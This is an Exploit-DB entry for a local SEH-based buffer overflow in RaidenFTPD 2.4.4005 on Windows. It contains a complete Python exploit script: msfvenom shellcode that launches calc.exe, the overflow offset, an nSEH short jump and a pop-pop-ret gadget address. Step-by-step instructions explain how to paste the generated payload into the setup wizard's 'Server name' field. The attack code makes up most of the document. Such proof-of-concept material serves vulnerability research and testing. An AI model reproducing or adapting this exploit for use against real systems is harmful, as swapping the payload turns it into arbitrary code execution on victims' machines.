RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

EDB-ID:

51611

CVE:

N/A

EDB Verified:

Author:

Andre Nogueira

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2023-07-20

Vulnerable App: 
# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe


#!/usr/bin/env python3
from struct import pack

crash = 2000
offset = 497

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" 
shellcode =  b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
SEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dll

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash -len(buffer))

file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services